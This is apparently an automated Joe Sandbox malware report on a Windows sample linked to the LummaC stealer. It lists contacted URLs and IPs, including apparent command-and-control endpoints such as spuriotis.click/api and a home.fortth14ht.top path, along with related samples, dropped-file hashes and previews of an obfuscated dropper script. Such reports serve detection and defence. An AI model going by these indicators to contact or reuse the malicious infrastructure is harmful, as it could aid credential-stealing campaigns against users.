                                                                  https://spuriotis.click/-Climb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://x1.c.lencr.org/0Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.i.lencr.org/0Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchClimb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.mozilla.org/products/firefoxgro.allClimb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://.jpges5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                                            high
                                                                            https://spuriotis.click/Climb.com, 00000015.00000002.2509180090.00000000039A8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.2331210727.00000000039A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://sectigo.com/CPS0es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoClimb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://curl.se/docs/http-cookies.htmles5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                                                  high
                                                                                  http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13Set-up.exe.0.drfalse
                                                                                    high
                                                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.Climb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.autoitscript.com/autoit3/XClimb.com, 00000015.00000003.1531954066.0000000003DF8000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000000.1364045625.0000000000185000.00000002.00000001.01000000.0000000B.sdmp, Fingers.18.drfalse
                                                                                            high
                                                                                            http://ocsp.rootca1.amazontrust.com0:Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://nsis.sf.net/NSIS_ErrorErrores5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000007.00000000.1286723336.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.drfalse
                                                                                                high
                                                                                                https://curl.se/docs/alt-svc.htmlSet-up.exe.0.drfalse
                                                                                                  high
                                                                                                  https://www.ecosia.org/newtab/Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://spuriotis.click:443/apiClimb.com, 00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brClimb.com, 00000015.00000003.1625219796.0000000005335000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://ac.ecosia.org/autocomplete?q=Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tes5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://httpbin.org/ipbeforees5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.drfalse
                                                                                                            high
                                                                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgClimb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#es5qBEFupj.exe, 00000000.00000002.1335270783.0000000006675000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?Climb.com, 00000015.00000003.1623850088.0000000003A28000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&uClimb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9eClimb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgClimb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Climb.com, 00000015.00000003.1579284363.0000000003A1B000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1579347004.0000000003937000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctaClimb.com, 00000015.00000003.1625704012.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 00000015.00000003.1625764118.00000000038FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            • No. of IPs < 25%
                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                            • 75% < No. of IPs
                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                            172.67.128.184
                                                                                                                            spuriotis.clickUnited States
                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                            34.226.108.155
                                                                                                                            httpbin.orgUnited States
                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                            194.87.58.92
                                                                                                                            home.fortth14ht.topRussian Federation
                                                                                                                            2118RELCOM-ASRelcomGroup19022019RUfalse
                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                            Analysis ID:1581590
                                                                                                                            Start date and time:2024-12-28 09:33:27 +01:00
                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                            Overall analysis duration:0h 9m 10s
                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                            Report type:full
                                                                                                                            Cookbook file name:default.jbs
                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                            Number of analysed new started processes analysed:27
                                                                                                                            Number of new started drivers analysed:0
                                                                                                                            Number of existing processes analysed:0
                                                                                                                            Number of existing drivers analysed:0
                                                                                                                            Number of injected processes analysed:0
                                                                                                                            Technologies:
                                                                                                                            • HCA enabled
                                                                                                                            • EGA enabled
                                                                                                                            • AMSI enabled
                                                                                                                            Analysis Mode:default
                                                                                                                            Analysis stop reason:Timeout
                                                                                                                            Sample name:es5qBEFupj.exe
                                                                                                                            renamed because original name is a hash value
                                                                                                                            Original Sample Name:25c8f6ada1179e3fcf486844e5c1ed24.exe
                                                                                                                            Detection:MAL
                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@28/23@11/3
                                                                                                                            EGA Information:
                                                                                                                            • Successful, ratio: 50%
                                                                                                                            HCA Information:Failed
                                                                                                                            Cookbook Comments:
                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 20.109.210.53
                                                                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                            • Execution Graph export aborted for target Set-up.exe, PID 7224 because there are no executed function
                                                                                                                            • Execution Graph export aborted for target es5qBEFupj.exe, PID 5600 because it is empty
                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                            TimeTypeDescription
                                                                                                                            03:34:26API Interceptor1x Sleep call for process: PasoCattle.exe modified
                                                                                                                            03:34:34API Interceptor9x Sleep call for process: Climb.com modified
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            172.67.128.184vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                              CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                34.226.108.155s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                      f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                                                                                                                                    194.87.58.92vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
                                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    spuriotis.clickvUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.2.51
                                                                                                                                                    httpbin.orgs8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    5KwhHEdmM4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    home.fortth14ht.topvUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    YrxiR3yCLm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    Cph7VEeu1r.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 185.121.15.192
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    RELCOM-ASRelcomGroup19022019RUvUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 194.87.58.92
                                                                                                                                                    arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.244
                                                                                                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.131
                                                                                                                                                    ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.244
                                                                                                                                                    hmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.131
                                                                                                                                                    harm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.244
                                                                                                                                                    harm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.131
                                                                                                                                                    hmips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.58.66.244
                                                                                                                                                    arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 194.87.30.79
                                                                                                                                                    CLOUDFLARENETUSvUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.157.254
                                                                                                                                                    fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.157.254
                                                                                                                                                    lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.167.249
                                                                                                                                                    BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 104.21.80.1
                                                                                                                                                    ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 104.21.92.219
                                                                                                                                                    ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.198.222
                                                                                                                                                    installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 172.67.166.49
                                                                                                                                                    Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.132.7
                                                                                                                                                    AMAZON-AESUSs8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=enGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 54.225.146.64
                                                                                                                                                    d8tp5flwzP.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                                    • 18.209.65.151
                                                                                                                                                    f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 34.226.108.155
                                                                                                                                                    E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 3.218.7.103
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    hx0wBsOjkQ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    MrIOYC1Pns.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 172.67.128.184
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\768400\Climb.comvUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                      CLaYpUL3zw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                            SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                              !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                  JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                    appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines (1070), with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):25405
                                                                                                                                                                        Entropy (8bit):5.118149909201556
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:PALCiiNosKwu7ZXl+pn6ZkoUJJyL0pwyYSYrtNdVi5f9EQoVV2jUDnQycptEbVOt:PA55wEwp6iJY0GyYNVi5fq+jhrkRSdf
                                                                                                                                                                        MD5:23812A6E32E38911133B221F39F9A20B
                                                                                                                                                                        SHA1:5B3B155889AB3A04ABDD1F195753E817ED3FDB23
                                                                                                                                                                        SHA-256:D4913EAF90D499344DE0A1B21B97392DC09B3C3A7C503E544EFDD12CD4C289CF
                                                                                                                                                                        SHA-512:02F1BB5D6016076451B84C84CF8FD09FC62BD33EDBAE6A4EFF0BE94DF56652B14E321C9D098B19A52CDD9703507EBFC2A54B4812A96CD1F90F810EBC3A3D3F58
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:Set Antenna=L..JNgTransport-Mail-Angola-Both-Directory-..klFlesh-Holders-Mx-Hugo-Guards-..ZhQThread-Say-Injury-Davis-Honda-..SpSoil-Wolf-True-Accidents-Theorem-Disabilities-Suggesting-Observation-..DiFSlot-Fucked-Rf-Shipping-Indianapolis-..mylSunset-Educators-Funky-..Set Content=2..VTkInd-Recorded-Dairy-Tons-Efficiency-..GCSpears-Associated-Adaptation-..BZReed-Protection-Treatment-Devel-Finish-Underwear-Earn-Recruitment-Relief-..ArpOriginal-Tigers-..SyJjPrevention-Eugene-Significant-Hair-Retail-Coding-Hospital-..InlSCottage-Vaccine-Wider-Computers-Level-Indian-Knowledge-Cleaning-..OCayChoosing-Closing-..vfWorldwide-Adequate-Notify-Icon-Vacation-Combat-Brass-..TQTaylor-..Set Advertisers=R..ndDenied-Weekend-Ticket-Like-Powerful-Intent-Olympic-..xyvvProved-Anonymous-Moved-Sword-Cargo-Employees-Foods-..hcpPossibly-Technology-Off-China-Biblical-Consolidated-Stan-..TCRoute-Essays-..vIqAGrades-August-Calculations-Rounds-Dk-Handjobs-Mali-Central-Columbus-..aYDKAcademy-Monitored-Accept-Parliame
                                                                                                                                                                        Process:C:\Users\user\Desktop\es5qBEFupj.exe
                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):425
                                                                                                                                                                        Entropy (8bit):5.353683843266035
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                                        MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                                        SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                                        SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                                        SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):947288
                                                                                                                                                                        Entropy (8bit):6.630612696399572
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                        MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                        SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                        SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                        SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: vUcZzNWkKc.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: CLaYpUL3zw.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: BagsThroat.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: SoftWare(1).exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: ZTM2pfyhu3.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: JA7cOAGHym.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: appFile.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: FloydMounts.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):459790
                                                                                                                                                                        Entropy (8bit):7.999632331590964
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:12288:P02pW2c56oA+/4hza+MglCQS9z/jgM/UB:w2LNMW6/gM/UB
                                                                                                                                                                        MD5:F9D71E9E58748BEEA3554073DCD205C8
                                                                                                                                                                        SHA1:0F059E563F46355BCA0866B3D7D0993DA4991C18
                                                                                                                                                                        SHA-256:45206C86B0AE3EB38240DD076201BE60B4983BBD0209CAA20516A9E6595C8BBA
                                                                                                                                                                        SHA-512:BBC015D43F281AF0D1CC75C3E41E13E09E5D24E9F23DB9FF5B6012E5D8978FD9C6C5C4A08B6262909660C606014BB375DCE1C4C909CA4B2D2CCA39722EBAF1A0
                                                                                                                                                                        Malicious:false
